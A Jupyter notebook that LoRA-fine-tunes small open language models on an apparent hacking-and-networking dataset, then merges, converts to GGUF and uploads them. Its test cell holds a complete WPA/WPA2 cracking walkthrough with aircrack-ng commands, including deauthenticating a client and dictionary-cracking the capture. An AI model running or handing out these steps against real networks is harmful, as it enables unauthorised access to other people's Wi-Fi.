# Required libraries

In [None]:
## Install required libraries
!pip install -q transformers datasets accelerate bitsandbytes peft trl torch
!pip install -q git+https://github.com/huggingface/peft.git
!pip install -q git+https://github.com/huggingface/transformers.git
!pip install -q sentencepiece
!pip install -q llama-cpp-python
!pip install -q ctranslate2
!pip install --upgrade transformers accelerate peft trl torch
exit()

# Imports:

In [None]:
import os
import torch
from datasets import load_dataset, concatenate_datasets
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    TrainingArguments,
    Trainer,
    DataCollatorForLanguageModeling
)
from peft import prepare_model_for_kbit_training, LoraConfig, get_peft_model
from trl import SFTTrainer


# Model download:

In [None]:
MODEL_NAME = "google/gemma-2-2b-it"  # Replace with the actual model name.
"""Supported models:
______________________________________________
|                                            |
|  1.google/gemma-2-9b                       |
|  2.google/gemma-2-2b                       |
|  3.google/gemma-2-2b-it                    |
|  4.google/codegemma-2b                     |
|  5.google/codegemma-7b-it                  |
|  6.microsoft/Phi-3-mini-4k-instruct        |
|  7.microsoft/Phi-3-mini-128k-instruct      |
|  8.microsoft/Phi-3-medium-128k-instruct    |
|  9.Qwen/Qwen2-7B-Instruct                  |   
|  10.Qwen/Qwen2-7B-Instruct-AWQ             |
|  11.meta-llama/Meta-Llama-3.1-8B           |  
|____________________________________________|  
And many more
"""

# use_auth_token="hf-token_from_huggingface" 
tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME,
                                        #   use_auth_token=""
                                        )
tokenizer.pad_token = tokenizer.eos_token

## Quantization configuration
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=False
)


model = AutoModelForCausalLM.from_pretrained(
    MODEL_NAME,
    quantization_config=bnb_config,
    device_map="auto",
    # use_auth_token=""
)

## Prepare the model for k-bit training
model = prepare_model_for_kbit_training(model)

## LoRA configuration
peft_config = LoraConfig(
    r=16,
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha=16,
    lora_dropout=0.05,
    bias="none",
    task_type="CAUSAL_LM"
)

## Apply LoRA to the model
model = get_peft_model(model, peft_config)


# Dataset Loading cell

In [None]:
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token

def formatting_prompts_func(examples):
    """
        Processes example data to generate formatted text using a given prompt and end-of-sequence token.

        This function extracts instructions, inputs, and outputs from the provided examples dictionary.
        It then formats these elements using the given alpaca_prompt and appends the EOS_TOKEN to each formatted text.
        Finally, it returns a dictionary containing the list of formatted texts.

        Args:
            examples (dict): A dictionary containing example data with keys such as "instruction", "input", "output", etc.
            alpaca_prompt (str): A string format to be used for generating the formatted text.
            EOS_TOKEN (str): A token to be appended at the end of each formatted text.

        Returns:
            dict: A dictionary with a single key "text" containing a list of formatted texts.
    """
    
    instructions = examples.get("instruction", examples.get("instruction",examples.get("system", [])))
    inputs = examples.get("input", examples.get("input",examples.get("command", [])))
    outputs = examples.get("output", examples.get("Output", examples.get("response", examples.get("Response", []))))

    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return {"text": texts} # Return a dictionary as expected by map function

def standardize_columns(dataset):
    """
        Standardizes the column names of a given dataset.

        This function renames specific columns in the dataset to standardized names.
        The renaming is based on a predefined dictionary that maps old column names to new ones.
        Only the columns present in the dataset will be renamed.

        Args:
            dataset (Dataset): The dataset whose columns need to be standardized. 
                            It should have a method `rename_columns` that accepts a dictionary for renaming.

        Returns:
            Dataset: The dataset with standardized column names.
    """
    rename_dict = {
        "Response": "output",
        "response": "output",
        "Output": "output",
        "Input": "input",
        "Instruction": "instruction",
        "Instruction": "system"
    }
    return dataset.rename_columns({k: v for k, v in rename_dict.items() if k in dataset.column_names})


# Insert the Dataset repo_id below to load the dataset from the repo: 

datasets_to_load = [
  "ICEPVP8977/Debian_Hacking_Networking",
]

def has_train_split(dataset_name):
    """
        Check if a dataset has a 'train' split.

        This function attempts to load a dataset and checks if it contains a 'train' split.

        Args:
            dataset_name (str): The name of the dataset to check.

        Returns:
            bool: True if the dataset has a 'train' split, False otherwise or if an error occurs.

        Raises:
            None: Exceptions are caught and False is returned.
    """
    try:
        dataset_info = load_dataset(dataset_name, split=None)
        return 'train' in dataset_info.keys()
    except:
        return False



datasets_with_train_split = [dataset_name for dataset_name in datasets_to_load if has_train_split(dataset_name)]

datasets = []
for dataset_name in datasets_with_train_split:
    try:
        dataset = load_dataset(dataset_name, split="train")
        standardized_dataset = standardize_columns(dataset)

        required_columns = ["instruction", "input", "output"]
        if all(col in standardized_dataset.column_names for col in required_columns):
            datasets.append(standardized_dataset)
            print(f"Successfully loaded and standardized: {dataset_name}")
        else:
            print(f"Skipping {dataset_name}: Missing required columns")
    except Exception as e:
        print(f"Error loading {dataset_name}: {str(e)}")

combined_dataset = concatenate_datasets(datasets)

formatted_dataset = combined_dataset.map(formatting_prompts_func, batched=True, remove_columns=combined_dataset.column_names)

formatted_dataset = formatted_dataset.shuffle(seed=199)


# Training configurations:

In [None]:
from transformers import TrainingArguments, DataCollatorForLanguageModeling
from trl import SFTTrainer

# Define training arguments without max_seq_length
training_args = TrainingArguments(
    output_dir="./results",
    num_train_epochs=3,#Default = 4
    per_device_train_batch_size=2,# default is 4, for low vram set to 1 or 2 depending on your GPU.
    gradient_accumulation_steps=2,# default is 4, for low vram set to 1 or 2 depending on your GPU.
    warmup_steps=100,
    learning_rate=2e-4,# For general and fast adaptation {5e-5} is generally recommended./-- For the model to reproduce the exact text from the datasets the learning rate {1e-5} or even lower.
    fp16=True,
    logging_steps=10,
    save_steps=100,
    save_total_limit=3,
    push_to_hub=False,
)


In [None]:

# Use a data collator for dynamic padding
data_collator = DataCollatorForLanguageModeling(
    tokenizer=tokenizer,
    mlm=False,  # Set to False for causal language modeling
)


In [None]:

# Initialize the trainer
trainer = SFTTrainer(
    model=model,
    args=training_args,
    train_dataset=formatted_dataset,
    peft_config=peft_config,
    dataset_text_field="text",
    tokenizer=tokenizer,
    data_collator=data_collator,  # Use the data collator
    packing=False,
    max_seq_length=8192  # Set the maximum sequence length here
)

In [None]:
# Train the model
trainer.train()

# Save to 4 bit

In [None]:
model = trainer.model.merge_and_unload()

In [None]:
# Save the full model in 4 bit
model.save_pretrained("./full_model")

In [None]:
# Save the tokenizer
tokenizer.save_pretrained("./full_model")

# Save to f16/32 
### I recommend considering the f16/32 format for its ease of conversion to the GGUF format.

In [None]:

model = model.to(torch.float32)
# Now convert the model to FP16
model_fp16_path = "./model_fp16"
model.half()  # Convert model to FP16, comment this line out to keep the f32 float model
model.save_pretrained(model_fp16_path)
tokenizer.save_pretrained(model_fp16_path)

In [None]:
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

# After training is complete

# Save the LoRA adapter
# trainer.model.save_pretrained("./lora_adapter")
MODEL_NAME="google/gemma-2-2b-it" 
# Load the original base model in FP16
base_model = AutoModelForCausalLM.from_pretrained(
    MODEL_NAME,
    torch_dtype=torch.float16,
    device_map="auto",
    # use_auth_token=""
)

# Load the LoRA adapter
adapter_model = PeftModel.from_pretrained(base_model, "./model_fp16")

# Merge the LoRA weights with the base model
merged_model = adapter_model.merge_and_unload()

# Save the full merged model in FP16
merged_model.save_pretrained("./full_model_fp16", safe_serialization=True)

# Save the tokenizer
tokenizer.save_pretrained("./full_model_fp16")

# Test the trained model

In [None]:
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
import gc

# Free VRAM
del base_model
del adapter_model
del merged_model
del tokenizer
gc.collect()
torch.cuda.empty_cache()

# Load the merged model and tokenizer
merged_model = AutoModelForCausalLM.from_pretrained("./full_model_fp16", torch_dtype=torch.float16, device_map="auto")
tokenizer = AutoTokenizer.from_pretrained("./full_model_fp16")


In [None]:
prompt = "How do I capture the handshake for WPA/WPA2 networks using Aircrack-ng?"

### ANSWER:
To capture the WPA/WPA2 handshake using Aircrack-ng, you need to follow these steps:

1. **Put the Wireless Interface in Monitor Mode:**
   You need to switch your wireless interface to monitor mode to capture packets. This can be done using the `airmon-ng` tool.

   ```bash
   airmon-ng start wlan0
   ```

   Replace `wlan0` with the name of your wireless interface.

2. **Start Airodump-ng to Capture the Handshake:**
   Use `airodump-ng` to capture the 4-way WPA/WPA2 handshake. You need to specify the channel and the BSSID (MAC address) of the access point you are targeting.

   ```bash
   airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
   ```

   Here:
   - `-c 9` specifies the channel of the wireless network.
   - `--bssid 00:14:6C:7E:40:80` specifies the MAC address of the access point.
   - `-w psk` sets the file name prefix for the capture file.
   - `ath0` is the interface name in monitor mode.

3. **Optional: Deauthenticate a Client to Force Reconnection:**
   If you want to speed up the process, you can use `aireplay-ng` to deauthenticate a client connected to the network, forcing it to reconnect and thus capturing the handshake.

   ```bash
   aireplay-ng --deauth 50 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
   ```

   Here:
   - `--deauth 50` sends 50 deauthentication packets.
   - `-a 00:14:6C:7E:40:80` specifies the MAC address of the access point.
   - `-c 00:0F:B5:FD:FB:C2` specifies the MAC address of the client to deauthenticate.

4. **Verify the Handshake Capture:**
   Once `airodump-ng` captures the handshake, you will see a message indicating that a WPA handshake has been captured.

   ```bash
   WPA handshake: 00:14:6C:7E:40:80
   ```

5. **Crack the Handshake:**
   After capturing the handshake, you can use `aircrack-ng` to crack the WPA/WPA2 pre-shared key using a dictionary attack.

   ```bash
   aircrack-ng -w wordlist.txt -b 00:14:6C:7E:40:80 psk-01.cap
   ```

   Here:
   - `-w wordlist.txt` specifies the wordlist file.
   - `-b 00:14:6C:7E:40:80` specifies the BSSID of the access point.
   - `psk-01.cap` is the capture file containing the handshake.

By following these steps, you can capture and attempt to crack the WPA/WPA2 pre-shared key using Aircrack-ng.

In [None]:
# prompt = "Your_question_here"
inputs = tokenizer(prompt, return_tensors="pt").to(merged_model.device)
max_new_tokens = 2000  # Set the maximum number of tokens in the response
outputs = merged_model.generate(**inputs, max_new_tokens=max_new_tokens)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response) 

# Convert to GGUF

In [None]:
!git clone https://github.com/ggerganov/llama.cpp.git
!pip install -r ./llama.cpp/requirements.txt 

In [None]:
!mkdir -p /content/gguf_model

In [None]:
!/content/llama.cpp/convert_hf_to_gguf.py /content/full_model_fp16 --outfile /content/gguf_model/output_file.gguf --outtype q8_0

# Push to huggingface

In [None]:
from huggingface_hub import login,HfApi


login(token="")
api = HfApi()

In [None]:
## Uploads the "full" trained model to the Hugging Face Hub
api.upload_folder(
    folder_path="/content/full_model_fp16",
    repo_id="",#"your_repo_id",
    repo_type="model"  # specify the type of repository
)
# Uploads the "gguf" trained model to the Hugging Face Hub
api.upload_folder(
    folder_path="/content/gguf_model",
    repo_id="",#"your_repo_id",
    repo_type="model"  # specify the type of repository
)